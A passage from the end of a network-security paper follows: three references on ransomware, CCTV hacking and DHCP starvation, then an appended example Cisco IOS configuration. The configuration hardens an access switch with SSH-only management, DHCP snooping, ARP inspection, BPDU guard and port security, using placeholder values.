[7] Ashok Koujalagi, Shweta Patil, and Praveen Akkimaradi. The Wannacry ransomeware, a mega cyber attack and their consequences on the modern India. International Journal of Information, 6(4):1-4, Apr. 2018.
[8] Mohammed Farook Bin Rafiuddin, Prethpal Singh Dhubb, and Hamza Minhas. Recent study of close circuit television (CCTV) in hacking. International Journal of Advance Research in Science and Engineering, 6(4):551-561, Apr. 2017.
[9] N. Tripathi and N. Hubballi. Exploiting DHCP server-side IP address conflict detection: A DHCP starvation attack. In 2015 IEEE International Conference on Advanced Networks and Telecommunications Systems (ANTS), pages 1-3, Dec. 2015.
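Added example, not configuration from the paper or from MUET's network: a Cisco IOS access-switch configuration that maps recommendations (1) to (12) of Section IV, and the STP, VTP, DHCP and CDP mitigations named in the attack sections, onto concrete commands. The hostname, interface numbers, VLAN 10, the VTP domain name and the credential are assumed placeholders.

```cisco
! Added example, not the paper's configuration. Cisco IOS hardening for one
! access switch; numbers in comments refer to recommendations (1)-(12).
! Hostname, interfaces, VLAN 10, VTP domain and credential are placeholders.
hostname ACCESS-SW1
ip domain-name example.invalid
! (1)(6)(7): local user instead of defaults, SSH only, password on EVERY vty line
username netadmin privilege 15 secret CHANGE-ME-PLACEHOLDER
crypto key generate rsa modulus 2048
ip ssh version 2
line vty 0 15
 login local
 transport input ssh
 exec-timeout 10 0
! (12): CDP off globally; re-enable per interface only where it is really needed
no cdp run
! (11): VTP version 3 as client; only the switch promoted with the exec-mode
! command "vtp primary" may change the VLAN database, so a higher revision
! number from a rogue server is no longer enough
vtp domain MUET-EXAMPLE
vtp version 3
vtp mode client
! (3)(4)(5)(9): DHCP snooping, Dynamic ARP Inspection and IP Source Guard
ip dhcp snooping
ip dhcp snooping vlan 10
ip arp inspection vlan 10
ip arp inspection validate src-mac dst-mac ip
! (10): BPDU guard on every PortFast port, so a BPDU on an access port shuts
! it; root guard (spanning-tree guard root) goes on the distribution-switch
! ports that face access switches
spanning-tree portfast bpduguard default
! (2)(8): user-facing access ports
interface range GigabitEthernet1/0/1 - 46
 switchport mode access
 switchport access vlan 10
 switchport port-security
 switchport port-security maximum 2
 switchport port-security violation restrict
 ip dhcp snooping limit rate 15
 ip verify source port-security
 spanning-tree portfast
! Uplink to distribution: the only port trusted for DHCP offers and ARP
interface GigabitEthernet1/0/48
 switchport mode trunk
 ip dhcp snooping trust
 ip arp inspection trust
! (8): unused port parked in an unused VLAN and shut down
interface GigabitEthernet1/0/47
 switchport access vlan 999
 shutdown
```

With DHCP snooping and DAI enabled, the switch logs rate-limit and inspection violations, which gives the administrator a detection signal for the starvation and rogue-server activity described in Section 11 rather than only a preventive control.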